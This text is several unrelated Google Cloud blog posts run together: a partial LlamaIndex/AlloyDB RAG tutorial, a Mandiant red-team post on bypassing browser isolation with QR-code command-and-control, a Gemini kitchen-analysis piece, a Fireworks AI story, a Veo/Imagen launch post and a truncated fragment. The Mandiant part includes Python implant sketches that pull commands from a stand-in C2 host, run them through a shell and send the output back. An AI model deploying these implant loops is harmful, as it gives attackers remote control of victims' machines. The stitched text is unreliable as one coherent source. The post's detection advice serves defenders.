The key to any RAG workflow is a well-curated knowledge base. Before you store the data, you need to ensure it is clean and useful. Data for the knowledge base can come from your enterprise data or other sources. To generate reports on top research articles, developers can use the Arxiv SDK to pull free, open-access publications.
Rather than using the ArxivReader to load and convert articles to plain text, you can use LlamaParse, which supports varying paper formats, tables, and multimodal media, leading to more accurate document parsing.
To improve the knowledge base’s effectiveness, we recommend adding metadata to documents. This allows for advanced filtering or support for additional tooling. Learn more about metadata extraction.
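As a sketch of this preparation step, the snippet below pulls recent papers with the arxiv package and parses them with LlamaParse (which requires a LLAMA_CLOUD_API_KEY); the query, paths, and metadata field are illustrative:

import os

import arxiv
from llama_parse import LlamaParse

os.makedirs("./papers", exist_ok=True)

client = arxiv.Client()
search = arxiv.Search(
    query="retrieval augmented generation",
    max_results=5,
    sort_by=arxiv.SortCriterion.SubmittedDate,
)

parser = LlamaParse(result_type="markdown")  # parses tables and rich media, not just text

documents = []
for paper in client.results(search):
    path = paper.download_pdf(dirpath="./papers")
    for doc in parser.load_data(path):
        # Attach metadata for the filterable "publication_date" column used later.
        doc.metadata["publication_date"] = paper.published.date().isoformat()
        documents.append(doc)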
2. Create a knowledge base: store data for retrieval
Now, the data needs to be saved for long-term use. The LlamaIndex Google Cloud database integrations support storage and retrieval of a growing knowledge base.
2.1. Create a secure connection to the AlloyDB or Cloud SQL database
Utilize the AlloyDBEngine class to easily create a shareable connection pool that securely connects to your PostgreSQL instance.
Create only the necessary tables needed for your knowledge base. Creating separate tables reduces the level of access permissions that your agent needs. You can also specify a special “publication_date” metadata column that you can filter on later.
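A minimal sketch, assuming the AlloyDBEngine interface exposed by llama-index-alloydb-pg; the project details are placeholders, and the class and method names follow the package's documented pattern but should be checked against the current docs:

from llama_index_alloydb_pg import AlloyDBEngine, Column

# Connection pool to the AlloyDB instance (placeholders for your own project).
engine = AlloyDBEngine.from_instance(
    project_id="my-project",
    region="us-central1",
    cluster="my-cluster",
    instance="my-instance",
    database="papers",
)

# Create only the tables the agent needs, with a filterable metadata column.
engine.init_vector_store_table(
    table_name="paper_chunks",
    vector_size=768,  # match your embedding model's dimensionality
    metadata_columns=[Column("publication_date", "DATE")],
)
engine.init_doc_store_table(table_name="paper_docs")
engine.init_index_store_table(table_name="paper_indexes")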
2.2. Customize the underlying storage with the Document Store, Index Store, and Vector Store. For the vector store, specify the metadata field “publication_date” that you created previously.
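Continuing the sketch, the stores can then be wired into a LlamaIndex StorageContext; the create_sync constructors are assumptions based on the package's documented pattern:

from llama_index.core import StorageContext
from llama_index_alloydb_pg import AlloyDBDocumentStore, AlloyDBIndexStore, AlloyDBVectorStore

doc_store = AlloyDBDocumentStore.create_sync(engine=engine, table_name="paper_docs")
index_store = AlloyDBIndexStore.create_sync(engine=engine, table_name="paper_indexes")
vector_store = AlloyDBVectorStore.create_sync(
    engine=engine,
    table_name="paper_chunks",
    metadata_columns=["publication_date"],  # expose the column created earlier
)

storage_context = StorageContext.from_defaults(
    docstore=doc_store, index_store=index_store, vector_store=vector_store
)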
2.3. Create tools from indexes to be used by the agent.
from llama_index.core.tools import QueryEngineTool

# index and summary_index are assumed to have been built from the stores above.
search_tool = QueryEngineTool.from_defaults(
    query_engine=index.as_query_engine(),
    description="Useful for retrieving specific snippets from research publications.",
)

summary_tool = QueryEngineTool.from_defaults(
    query_engine=summary_index.as_query_engine(),
    description="Useful for answering high-level questions about research publications.",
)
3. Prompt: create an outline for the report
Reports may have requirements for sections and formatting, so the agent needs formatting instructions. Here is an example outline of a report format:
outline = """
# DATE Daily report: TOPIC

## Executive Summary

## Top Challenges / Description of problems

## Summary of papers

| Title | Authors | Summary | Links |
| ----- | ------- | ------- | ----- |
| LOTUS: Enabling Semantic Queries with LLMs Over Tables of Unstructured and Structured Data | Liana Patel, Siddharth Jha, Carlos Guestrin, Matei Zaharia | ... | https://arxiv.org/abs/2407.11418v1 |
"""
4. Define the workflow: outline agentic steps
Next, you define the workflow to guide the agent's actions. In this example workflow, the agent reasons about which tool to call: the summary tool or the vector search tool. Once the agent determines that it doesn't need additional data, it exits the research loop to generate the report.
LlamaIndex Workflows provides an easy-to-use SDK to build any type of workflow:
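As a sketch of what such a research loop can look like using the primitives in llama_index.core.workflow; the helpers gather_notes, needs_more_context, and draft_report are hypothetical stand-ins for the tool calls described above:

from llama_index.core.workflow import Event, StartEvent, StopEvent, Workflow, step

class ResearchEvent(Event):
    notes: str

class ReportEvent(Event):
    notes: str

class ReportWorkflow(Workflow):
    @step
    async def research(self, ev: StartEvent | ResearchEvent) -> ResearchEvent | ReportEvent:
        # Let the LLM pick a tool (vector search or summary) and accumulate notes.
        notes = await gather_notes(ev)         # hypothetical helper wrapping the tools
        if needs_more_context(notes):          # hypothetical stop condition
            return ResearchEvent(notes=notes)  # loop back for another research pass
        return ReportEvent(notes=notes)

    @step
    async def write_report(self, ev: ReportEvent) -> StopEvent:
        # Hypothetical helper: have the LLM fill in the outline defined above.
        report = await draft_report(ev.notes, outline)
        return StopEvent(result={"response": report})

agent = ReportWorkflow(timeout=600)

Returning the result as a dict keyed by "response" matches how the report is read back in the final step below.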
Now that you’ve set up a knowledge base and defined an agent, you can set up automation to generate a report!
query = "What are the recently published RAG techniques"
report = await agent.run(query=query)

# Save the report
with open("report.md", "w") as f:
    f.write(report["response"])
There you have it! A complete report that summarizes recent research in LLM and RAG techniques. How easy was that?
Get started today
In short, these LlamaIndex integrations with Google Cloud databases enable application developers to leverage the data in their operational databases to easily build complex agentic RAG workflows. This collaboration supports Google Cloud's long-term commitment to be an open, integrated, and innovative database platform. With LlamaIndex's extensive user base, this integration further expands the possibilities for developers to create cutting-edge, knowledge-driven AI agents.
Ready to get started? Take a look at the Notebook-based tutorials published with the llama-index-alloydb-pg and llama-index-cloud-sql-pg packages.
Browser isolation is a security technology where web browsing activity is separated from the user’s local device by running the browser in a secure environment, such as a cloud server or a virtual machine, and then streaming the visual content to the user’s device.
Browser isolation is often used by organizations to combat phishing threats, protect the device from browser-delivered attacks, and deter typical command-and-control (C2 or C&C) tactics used by attackers.
In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device.
Background on Browser Isolation
The great folks at SpecterOps released a blog post earlier this year on browser isolation and how penetration testers and red team operators may work around browser isolation scenarios for ingress tool transfer, egress data transfer, and general bypass techniques. In summary, browser isolation protects users from web-based attacks by sandboxing the web browser in a secure environment (either local or remote) and streaming the visual content back to the user’s local browser. The experience is (ideally) fully transparent to the end user. According to most documentation, three types of browser isolation exist:
Remote browser isolation (RBI), the most secure and the most common variant, sandboxes the browser in a cloud-based environment.
On-premises browser isolation is similar to RBI but runs the sandboxed browser on-premises. The advantage of this approach is that on-premises web-based applications can be accessed without requiring complex cloud-to-on-premises connectivity.
Local browser isolation, or client-side browser isolation, runs the sandboxed browser in a local containerized or virtual machine environment (e.g., Docker or Windows Sandbox).
The remote browser handles everything from page rendering to executing JavaScript. Only the visual appearance of the web page is sent back to the user’s local browser (a stream of pixels). Keypresses and clicks in the local browser are forwarded to the remote browser, allowing the user to interact with the web application. Organizations often use proxies to ensure all web traffic is served through the browser isolation technology, thereby limiting egress network traffic and restricting an attacker’s ability to bypass the browser isolation.
SpecterOps detailed some of the challenges that offensive security professionals face when operating in browser isolation environments. They document possible approaches on how to circumvent browser isolation by abusing misconfigurations, such as using HTTP headers, cookies, or authentication parameters to bypass the isolation features.
Command and control (C2 or C&C) refers to an attacker's ability to remotely control compromised systems via malicious implants. The most common channel to send commands to and from a victim device is through HTTP requests; a minimal sketch of this loop follows the list:
The implant requests a command from the attacker-controlled C2 server through an HTTP request (e.g., in the HTTP parameters, headers, or request body).
The C2 server returns the command to execute in the HTTP response (e.g., in headers or response body).
The implant decodes the HTTP response and executes the command.
The implant submits the command output back to the C2 server with another HTTP request.
The implant “sleeps” for a while, then repeats the cycle.
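To make the lifecycle concrete, here is a minimal sketch of a conventional HTTP C2 loop; the domain and paths are placeholders:

import subprocess
import time

import requests

C2 = "https://c2.example.com"

while True:
    # Steps 1-2: request a command; the server returns it in the response body.
    command = requests.get(f"{C2}/task").text
    if command:
        # Step 3: decode and execute the command.
        output = subprocess.run(command, shell=True, capture_output=True).stdout
        # Step 4: submit the output back to the C2 server.
        requests.post(f"{C2}/result", data=output)
    # Step 5: sleep, then repeat.
    time.sleep(60)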
However, this approach presents challenges when browser isolation is in use. When making HTTP requests through a browser isolation system, the HTTP response returned to the local browser contains only the streaming engine used to render the remote browser's visual page contents. The original HTTP response (from the web server) is available only in the remote browser, where it is rendered; just a stream of pixels is sent to the local browser to visually render the web page. This prevents typical HTTP-based C2, because the local device cannot decode the HTTP response (step 3).
Figure 1: Sequence diagram of browser isolation HTTP request lifecycle
In this blog post, we will explore a different approach to achieving C2 with compromised systems in browser isolation environments, working entirely within the browser isolation context.
Sending C2 Data Through Pixels
Mandiant's Red Team developed a novel solution to this problem. Instead of returning the C2 data in the HTTP response headers or body, the C2 server returns a valid web page that visually displays a QR code. The implant then uses a local headless browser (e.g., driven by Selenium) to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data. By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the web page is rendered in a remote browser.
Figure 2: Sequence diagram of C2 via QR codes
Instead of decoding the HTTP response to obtain the command to execute, the implant visually renders the web page (from the browser isolation's pixel-streaming engine) and decodes the command from the QR code displayed on the page. The new C2 loop is as follows, with a simplified sketch of the screenshot-and-decode steps after the list:
The implant controls a local headless browser via the DevTools protocol.
The implant retrieves the web page from the C2 server via the headless browser. This request is forwarded to the remote (isolated) browser and ultimately lands on the C2 server.
The C2 server returns a valid HTML web page with the command data encoded in a QR code (visually shown on the page).
The remote browser returns the pixel streaming engine back to the local browser, starting a visual stream showing the rendered web page obtained from the C2 server.
The implant waits for the page to fully render, then grabs a screenshot of the local browser. This screenshot contains the QR code.
The implant uses an embedded QR scanning library to read the QR code data from the screenshot, thereby obtaining the embedded data.
The implant executes the command on the compromised device.
The implant (again through the local browser) navigates to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server; after all, in legitimate cases, URL parameters may be required to return the correct web page. The C2 server can then decode the command output as in traditional HTTP-based C2.
The implant “sleeps” for a while, then repeats the cycle.
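As a simplified illustration of steps 5 and 6, the sketch below drives a headless Chrome via Selenium and decodes the QR code with the pyzbar library. This is not Mandiant's PoC (which, as described next, used Puppeteer), and the hosts and paths are placeholders:

import io
import subprocess
import time

from PIL import Image
from pyzbar.pyzbar import decode
from selenium import webdriver

options = webdriver.ChromeOptions()
options.add_argument("--headless=new")
driver = webdriver.Chrome(options=options)

# Request the C2 page; the isolation proxy returns only the pixel stream.
driver.get("https://c2.example.com/page")
time.sleep(5)  # wait for the remote browser's visual stream to render

# Grab a screenshot of the rendered pixels and decode the QR code from it.
screenshot = Image.open(io.BytesIO(driver.get_screenshot_as_png()))
codes = decode(screenshot)
if codes:
    command = codes[0].data.decode()
    output = subprocess.run(command, shell=True, capture_output=True).stdout
    # Return the output through a URL parameter, which passes through to the C2 server.
    driver.get("https://c2.example.com/page?output=" + output.hex())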
Mandiant developed a proof-of-concept (PoC) implant using Puppeteer and the Google Chrome browser in headless mode (though any modern browser could be used). We even went a step further and integrated the implant with Cobalt Strike’s External C2 feature, allowing the use of Cobalt Strike’s BEACON implant while communicating over HTTP requests and QR code responses.
Figure 3: Demo of C2 through QR codes in browser isolation scenarios (Chrome browser window would be hidden in real-world applications)
Because this technique relies on the visual content of the web page, it works in all three browser isolation types (remote, on-premises, and local).
While the PoC demonstrated the feasibility of this technique, there are some considerations and drawbacks:
During Mandiant's testing, using QR codes with the maximum data size (2,953 bytes, 177x177 grid, Error Correction Level "L") was infeasible, as the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents. Mandiant was forced to fall back to QR codes containing a maximum of 2,189 bytes of content. Note: QR codes can store up to 2,953 bytes per instance, depending on the Error Correction Level (ECL). Higher ECL settings make the QR code more easily readable, but reduce the maximum data size.
Due to the overhead of using Chrome in headless mode, the remote browser startup time, the page rendering requirements, and the stream of visual content from the remote browser back to the local browser, each request takes ~5s to reliably show and scan the QR code. This introduces significant latency in the C2 channel. For example, at the time of writing, a BEACON payload is ~323 KiB. At 2,189 bytes per QR code and 5s per request, a full BEACON payload is transferred in approximately 12m20s (~438 bytes/s, assuming every QR code can be successfully scanned and every network request goes through seamlessly). While this throughput is certainly sufficient for typical C2 operations, some techniques (e.g., SOCKS proxying) become infeasible.
Other security features of browser isolation, such as domain reputation, URL scanning, data loss prevention, and request heuristics, are not considered in this blog post. Offensive security professionals will have to overcome these protection measures as well when operating in browser isolation environments.
Conclusion and Recommendations
In this blog post, Mandiant demonstrated a novel technique to establish C2 when faced with browser isolation. While this technique proves that browser isolation technologies have weaknesses, Mandiant still recommends browser isolation as a strong protection measure against other types of attacks (e.g., client-side browser exploitation, phishing, etc). Organizations should not solely rely on browser isolation to protect themselves from web-based threats, but rather embrace the “defense in depth” strategy and establish a well-rounded cyber defense posture. Mandiant recommends the following controls:
Monitor for anomalous network traffic: Even when using browser isolation, organizations should inspect network traffic and monitor for anomalous usage. The C2 method described in this post is low-bandwidth, hence transferring even small datasets will require many HTTP requests.
Monitor for browsers in automation mode: Organizations can monitor when browsers are used in automation mode (as shown in the Figure 3 demo) by inspecting the process command line. Chromium-based browsers use flags such as --enable-automation and --remote-debugging-port to enable other processes to control the browser through the DevTools protocol. Organizations can monitor for these flags during process creation.
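As a starting point, a minimal sketch using the psutil package can flag such processes; the browser names and flags checked are illustrative, not an exhaustive detection rule:

import psutil

AUTOMATION_FLAGS = ("--enable-automation", "--remote-debugging-port")
BROWSERS = ("chrome", "msedge", "chromium")

for proc in psutil.process_iter(["name", "cmdline"]):
    name = (proc.info["name"] or "").lower()
    cmdline = " ".join(proc.info["cmdline"] or [])
    if any(b in name for b in BROWSERS) and any(f in cmdline for f in AUTOMATION_FLAGS):
        print(f"Possible automated browser: PID {proc.pid}: {cmdline}")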
Through numerous adversarial emulation engagements and Red Team and Purple Team assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their targets. Review our Technical Assurance services and contact us for more information.
Businesses across all industries are turning to AI for a clear view of their operations in real-time. Whether it’s a busy factory floor, a crowded retail space, or a bustling restaurant kitchen, the ability to monitor your work environment helps businesses be more proactive and ultimately, more efficient.
Gemini 1.5 Pro's multimodal and long-context-window capabilities can improve operational efficiency for businesses by automating tasks from inventory management to safety assessments. One powerful use case that's emerged for developers is AI-powered kitchen analysis for busy restaurants. AI-powered kitchen analysis can benefit everyone: it can help a restaurant's bottom line, train employees more efficiently, and improve safety assessments to help create a safer work environment.
In this post, we’ll show you how this works, and ways you can apply it to your business.
Understanding multimodal AI & long context window:
Before we step into the kitchen, let’s break down what “multimodal” and “long context window” mean in the world of AI:
Multimodal AI can process and understand multiple types of data. Think of it as an AI system that can see, hear, read, and understand all at once. In our context, it can take the following forms:
Text: Recipes, orders, and inventory lists
Images: Food presentation and kitchen layouts
Audio: Kitchen commands and customer feedback
Video: Real-time cooking processes and staff movements
Taken together, these data representations can reach gigabytes in size, which is where Gemini's long context window comes into play. Long context windows can consume millions of tokens (data points) at once. This makes it possible to input all the data mentioned above – from text to video – and generate cohesive outputs without losing any context.
With the multimodal AI market projected to exceed $13 billion by 2032, growing at a CAGR of around 30% from 2024 to 2032, multimodal plus long-context-window capabilities are the secret ingredients for success.
Let's look at a real-world example
When it comes to running a restaurant, AI can step in as your inventory manager and safety inspector all rolled into one. In the following test, we fed Gemini a five-minute video of a chef preparing meals during peak operating hours.
We asked Gemini, with a simple prompt, to analyze the video and return multiple values that would help us assess the meal preparation's efficiency. First, we asked Gemini for the timestamps spent on each part of the process:
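A minimal sketch of that first request with the Vertex AI SDK for Python; the project, bucket path, and prompt wording are placeholders:

import vertexai
from vertexai.generative_models import GenerativeModel, Part

vertexai.init(project="your-project-id", location="us-central1")
model = GenerativeModel("gemini-1.5-pro")

# Reference the kitchen video directly from Cloud Storage (placeholder path).
video = Part.from_uri("gs://your-bucket/kitchen-prep.mp4", mime_type="video/mp4")
prompt = (
    "Analyze this kitchen video. For each step of the meal preparation, "
    "return the step name with its start and end timestamps."
)

response = model.generate_content([video, prompt])
print(response.text)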
Next, to find bottlenecks and optimize workflows we asked Gemini to identify the following key moments:
Positive moments
Potential safety issues
Inventory counts
Suggestions for improvement
Together, we put these values in a graph that broke down the efficiency of each task and identified opportunities for improvement. We also asked Gemini to translate the results into several different languages for a diverse kitchen staff.
The final result: Here’s how Gemini analyzed the kitchen
1. Real-time meal preparation and object tracking:
Gemini’s object detection capabilities identified ingredients and monitored cooking processes in real-time. By extracting the start and end timestamps for each meal preparation, you can precisely measure meal prep times.
2. Inventory management:
Say goodbye to the “Oops, we’re out of that” moment. By accurately tracking ingredient usage, Gemini helped prevent stock-outs and enabled proactive inventory replenishment.
3. Safety assessments:
From detecting a slippery floor to noticing an unattended flame, Gemini picked up on those details that are easy to miss. It’s not about replacing human vigilance—it’s about enhancing it, creating a safer environment for both staff and diners.
4. Multilingual capabilities:
In a global culinary landscape, language barriers can be troublesome. Gemini broke down these barriers, ensuring that whether your chef speaks Mandarin or your server speaks Spanish, everyone’s on the same page.
Gemini’s analysis of a five-minute video could help restaurants optimize operations, reduce costs, and enhance the customer experience. By automating and optimizing mundane tasks, staff can focus on what matters—creating culinary masterpieces and delivering exceptional service. It also helps businesses grow by improving cost savings – optimized inventory and resource management translate directly to a business’s financial bottom line.
And, proactive hazard detection means fewer accidents and a safer work environment. It’s not just about avoiding lawsuits—it’s about creating a culture of care.
The future is served
Gemini’s models are pioneers in the market, unlocking use cases that are made possible with Google’s research and advancements. But Gemini’s impact extends far beyond the restaurant industry – its long context window allows businesses to analyze vast amounts of data, unlocking insights that were previously too costly to attain.
Enterprises across industries are investing in AI technologies to move faster, be more productive, and give their customers the products and services that they need. But moving AI from prototype to production isn’t easy. That’s why we created Fireworks AI.
The story of Fireworks AI started seven years ago at Meta AI, where a group of innovators worked on PyTorch — an ambitious project building leading AI infrastructure from scratch. Today, PyTorch is one of the most popular open-source AI frameworks, serving trillions of inferences daily.
Many companies building AI products struggle to balance total cost of ownership (TCO) with performance quality and inference speed, while transitions from prototype to production can also be challenging. Leaders at PyTorch saw a tremendous opportunity to use their years of experience to help companies solve this challenge. And so, Fireworks AI was born.
Fireworks AI delivers the fastest and most efficient gen AI inference engine to date. We’re pushing the boundaries with compound AI systems, which replace more traditional single AI models with multiple interacting models. Think of a voice-based search application that uses audio recognition models to transcribe questions and language models to answer them.
With support from partners like NVIDIA and their incredible CUDA and CUTLASS libraries, we're evolving fast so companies can start taking their next big steps into gen AI.
Here's how we work with Google Cloud to tackle the scale, cost, and complexity challenges of gen AI.
Matching customer growth with scale
Scale is a primary concern when moving into production, because AI moves fast. Fireworks’ customers might develop new models that they want to roll out right away or find that their demand has doubled overnight, so we need to be able to scale quickly and immediately.
While we’re building state-of-the-art infrastructure software for gen AI, we look to top partners to provide architectural components for our customers. Google Cloud’s engineering strength provides an incredible environment for performance, reliability, and scalability. It’s designed to handle high-volume workloads while maintaining excellent uptime. Currently, Fireworks processes over 140 billion tokens daily with 99.99% API uptime, so our customers never experience interruptions.
Google Kubernetes Engine (GKE) and Compute Engine are also essential to our environment, helping us run control plane APIs and manage the fleet of GPUs.
Google Cloud offers us outstanding scalability so that we’re always only using right-sized infrastructure. When customers need to scale, we can instantly meet their requests.
Since Fireworks is a member of the Google for Startups program, Google Cloud provided us with credits that were essential for growing our operations.
Stopping runaway costs of AI
Scale isn’t the only thing companies need to worry about. Costs can balloon overnight after deploying AI, and enterprises need efficient ways to scale to maintain sustainable growth. By analyzing performance and environments, Fireworks can help them balance scale and efficiency.
We use Cloud Pub/Sub and Cloud Functions for reporting and billing event processing, and Cloud Monitoring for logging and alerting on analytics metrics. All request and billing data is then stored in BigQuery, where we can analyze usage and volumes for each customer model. This helps us determine whether we have extra capacity, whether we need to scale, and by how much.
Google Cloud’s blue-chip cloud environment also allows us to provide more to our customers without breaking budgets. Because we can offer 4X lower latency and 4X higher throughput compared to competing hosted services, we provide better performance for reduced prices. Customers then won’t need to swell their budget to increase performance, keeping TCO down.
The right environment for any customer
Every gen AI solution has its own complexities and nuances, so we need to remain flexible to tailor the environment for each customer. Some enterprises might need different GPUs for different parts of a compound AI system, or they might want to deploy smaller fine-tuned models alongside larger models. Google Cloud gives us the freedom to split up tasks and use any GPUs that we need, as well as integrate with a diverse range of models and environments.
This is especially important when it comes to data privacy and security concerns for customers in sensitive industries such as finance and healthcare. Google Cloud provides robust security features like encryption and secure VPC connectivity, and it helps comply with compliance statutes such as HIPAA and SOC 2.
Meeting our customers where they are – which is a moving target – is critical to our success in gen AI. Companies like Google Cloud and NVIDIA help us do just that.
Powering innovation in gen AI
Our philosophy is that enterprises of all sizes should be able to experiment with and build AI products. AI is a powerful technology that can transform industries and help businesses compete on a global scale.
Keeping AI open source and accessible is paramount, and that’s one of the reasons we continue to work with Google Cloud. With Google Cloud, we can enable more companies to drive value from innovative uses of gen AI.
Generative AI is leading to real business growth and transformation. Among enterprise companies with gen AI in production, 86% report an increase in revenue1, with an estimated 6% growth. That’s why Google is investing in its AI technology with new models like Veo, our most advanced video generation model, and Imagen 3, our highest quality image generation model. Today, we’re building on that momentum at Google Cloud by offering our customers access to these advanced generative media models on Vertex AI:
Veo, now available on Vertex AI in private preview, empowers companies to effortlessly generate high-quality videos from simple text or image prompts. As the first hyperscaler to offer an image-to-video model, we’re helping companies transform their existing creative assets into dynamic visuals. This groundbreaking technology unlocks new possibilities for creative expression and streamlines video production workflows.
Imagen 3 will be available to all Vertex AI customers starting next week. Imagen 3 generates the most realistic and highest quality images from simple text prompts, surpassing previous versions of Imagen in detail, lighting, and artifact reduction. Businesses can seamlessly create high quality images that reflect their own brand style and logos for use in marketing, advertising, or product design.
Vertex AI provides an orchestration platform that makes it simple to customize, evaluate performance, and deploy these models on our leading infrastructure. In alignment with our AI Principles, the development and deployment of Veo and Imagen 3 on Vertex AI prioritizes safety and responsibility with built-in precautions like digital watermarking, safety filters, and data governance.
Veo: our most capable video generation model, now available on Vertex AI
Developed by Google DeepMind, Veo generates high-quality, high-definition videos based on text or image prompts in a wide range of cinematic and visual styles with exceptional speed. With an advanced understanding of natural language and visual semantics, it generates video that closely aligns to the prompt. Veo on Vertex AI creates footage that’s consistent and coherent, so people, animals, and objects move realistically throughout shots. See examples of Veo’s image-to-video generation capabilities on Vertex AI below:
Image-to-video: Veo generates videos from existing or AI-generated images. Below are examples of how Veo uses images generated using Imagen 3 (top two images) and real-world images (bottom two images) to create short video clips.
Text-to-video: Below are examples of how Veo uses text to create short video clips.
Veo on Vertex AI empowers companies to effortlessly generate high-quality videos from simple text or image prompts. This means faster production, reduced costs, and the ability to quickly prototype and iterate on video content. Veo’s technology can be a great partner for human creativity by allowing creators to focus on higher-level tasks while AI can help handle tedious or repetitive aspects of video production. Customers like Agoda are using the power of AI models like Veo, Gemini, and Imagen to streamline their video ad production, achieving a significant reduction in production time. Whether you’re a marketer crafting engaging social media posts, a sales team creating compelling presentations, or a production team exploring new concepts, Veo streamlines your workflow and unlocks new possibilities for visual storytelling.
Imagen 3: Our highest quality image generation model, now generally available on Vertex AI
Imagen 3 is our highest quality text-to-image model. It generates an incredible level of detail, producing photorealistic, lifelike images, with far fewer distracting visual artifacts than our prior models.
Starting next week, all Google Cloud customers will be able to access Imagen 3 on Vertex AI. With Imagen 3 on Vertex AI, you can generate high-definition images from a simple text prompt. See examples of Imagen 3's image generation capabilities below:
Additionally, we’re making new features generally available to customers on our allowlist that help companies edit and customize images to meet their business needs. To join the allowlist, apply here.
Imagen 3 editing provides a powerful and user-friendly way to refine and tailor any image. You can edit photos with a simple text prompt, edit only parts of an image (mask-based editing), including updating product backgrounds, or upscale the image to meet size requirements.
Imagen 3 Customization provides greater control by guiding the model to generate images with your desired characteristics. You can now infuse your own brand, style, logo, subject, or product features when generating new images, opening up new creative possibilities and accelerating the development of advertising and marketing assets.
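To make this concrete, here is a minimal sketch of generating an image with Imagen on Vertex AI via the Python SDK. The project ID, model ID, and prompt below are placeholders, and parameter names can vary by SDK release, so treat this as illustrative rather than definitive:

```python
# Minimal sketch: generating an image with Imagen on Vertex AI.
# Project, region, model ID, and prompt are placeholders; check the
# Vertex AI documentation for the current model version.
import vertexai
from vertexai.preview.vision_models import ImageGenerationModel

vertexai.init(project="your-project-id", location="us-central1")

model = ImageGenerationModel.from_pretrained("imagen-3.0-generate-001")
images = model.generate_images(
    prompt="A photorealistic product shot of a ceramic mug on a wooden table",
    number_of_images=1,
)
images[0].save(location="mug.png")
```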
Build with enterprise safety and security
Designing and developing AI to be secure, safe, and responsible is paramount. Consistent with our AI Principles, Veo and Imagen 3 on Vertex AI were built with safety at the core.
Digital watermarking: Google DeepMind’s SynthID embeds invisible watermarks into every image and frame that Imagen 3 and Veo produce, helping decrease misinformation and misattribution concerns.
Safety filters: Veo and Imagen 3 both have built-in safeguards to help protect against the creation of harmful content and adhere to Google's Responsible AI Principles. We will continue investing in new techniques to improve the safety and privacy protections of our models.
Data governance: We do not use customer data to train our models, in accordance with Google Cloud’s built-in data governance and privacy controls. Your customer data is only processed according to your instructions.
Copyright indemnity: Our indemnity for generative AI services offers peace of mind with an industry-first approach to copyright concerns.
Customers delivering value with Veo and Imagen on Vertex AI
Leading consumer packaged goods company Mondelez International, which includes brands such as Chips Ahoy!, Cadbury, Oreo, and Milka, is using generative AI to accelerate and enhance campaign content creation, allowing rapid development of consumer-ready visuals at scale for 100+ brands sold in 150 countries.
“Our collaboration with Google Cloud has been instrumental in harnessing the power of generative AI, notably through Imagen 3, to revolutionize content production. This technology has enabled us to produce hundreds of thousands of customized assets, enhancing creative quality while significantly reducing both time to market and costs. With the introduction of Veo, Mondelez and its agency partners (Accenture, Publicis, The Martin Agency, VCCP, Vayner and WPP) are poised to expand these capabilities into video content, further streamlining production processes and setting new benchmarks in marketing.” — Jon Halvorson, SVP of Consumer Experience & Digital Commerce, Mondelez International
“Mondelez is embarking on a bold journey of AI-driven transformation, partnering strategically with Google Cloud as our core AI platform. This is not simply a technology adoption; it’s a deep, collaborative partnership leveraging Google’s cutting-edge AI capabilities and infrastructure to fuel our innovation and growth ambitions. This partnership reinforces Mondelez’s commitment to continuous adoption of leading-edge technology to advance our business capabilities.” — Tiffani Sossei, SVP Chief Digital Experience Officer, Mondelez International
WPP is a world leader in marketing and communication services. Its AI-powered operating system for marketing transformation, WPP Open, already utilizes Imagen 3 for image generation and will soon incorporate Veo for video generation, streamlining the ideation and production of content. This expansion empowers WPP to unlock even greater levels of creativity and efficiency.
“At WPP, we believe in the transformative power of AI to enable our people to do their best work. We built WPP Open from the ground up and leverage Google Cloud’s AI capabilities within it to help bring to life the creative vision of clients such as L’Oréal, resulting in the production of compelling content and making iteration and concepting easier than ever before. With Veo and Imagen, we are narrowing the gap between imagination and execution, enabling our people to develop high-quality, photo-realistic, campaign-ready visuals in a matter of minutes.” – Stephan Pretorius, Chief Technology Officer, WPP
Agoda is a digital travel platform that helps travelers see the world for less with great-value deals on a global network of over 4.5M hotels and holiday properties, plus flights, activities, and more. Agoda is now testing Imagen and Veo on Vertex AI to create visuals, allowing its teams to generate unique images of travel destinations that are then used to generate videos.
Example of how Agoda’s marketing team used AI models like Veo and Imagen to help create a promotional video.
“At Agoda, we’re committed to helping people see the world for less and making travel experiences more accessible. We are exploring the media generation capabilities of Google Cloud AI, using Imagen to create unique visuals of dream destinations in various styles. These images are then brought to life as videos through experiments with Veo’s image-to-video technology. These technologies hold the potential to streamline our content creation process from days to hours. By continuing our testing, we aim to explore how this combination can enhance creative possibilities and personalized advertising efficiently. With these tools, we hope to engage customers meaningfully and inspire future adventures.” – Matteo Frigerio, Chief Marketing Officer, Agoda
Quora, a leading online platform for people worldwide to share knowledge and learn from each other, has developed Poe, a platform that allows users to interact with leading gen AI models, including Gemini, Imagen, and now Veo through Vertex AI. With Veo and Imagen, Poe users can unlock new levels of creativity and bring their ideas to life with incredible ease and speed.
“We created Poe to democratize access to the world’s best gen AI models. With Veo, we’re now enabling millions of users to bring their ideas to life through stunning, high-quality generative video. Through partnerships with leaders like Google, we’re expanding creative possibilities across all AI modalities. We can’t wait to see what our community creates with Veo.” – Spencer Chan, Product Lead, Poe by Quora
Honor is a leading global provider of smart devices. They are now bringing the power of AI image generation directly to consumers’ fingertips by integrating Imagen into millions of smartphones. This allows users to easily enhance and customize their photos with features like outpainting and stylization.
“At Honor, we’re committed to delivering cutting-edge technology that our millions of users can implement to enhance their daily lives. We chose to integrate Imagen on Vertex AI because it provides outstanding image generation capabilities that are both powerful and user-friendly. With Imagen, our customers can effortlessly create, edit, and reimagine images directly on their smartphones, transforming everyday moments into extraordinary visuals. We look forward to innovating with Google Cloud as their latest generative media models continue to push the boundaries of creative expression.” – George Zhao, CEO, Honor
Get started
To get started with Veo on Vertex AI, reach out to your Google Cloud account representative. To get started with Imagen on Vertex AI, see our documentation. You'll be able to access Imagen 3 on Vertex AI starting next week.
At the Gemini for Work event in September, we showcased how generative AI is transforming the way enterprises work. Across all the customer innovation we saw at the event, one thing was clear – if last year was about gen AI exploration and experimentation, this year is about achieving real-world impact.
Gen AI has the potential to revolutionize how we work, but only if its output is reliable and relevant. Large language models (LLMs), with their knowledge frozen in time during training, often lack access to the latest information and your internal data. In addition, they are by design creative and probabilistic, and therefore prone to hallucinations. And finally, they do not offer built-in source attribution. These limitations hinder their ability to provide up-to-date, contextually relevant and dependable responses.
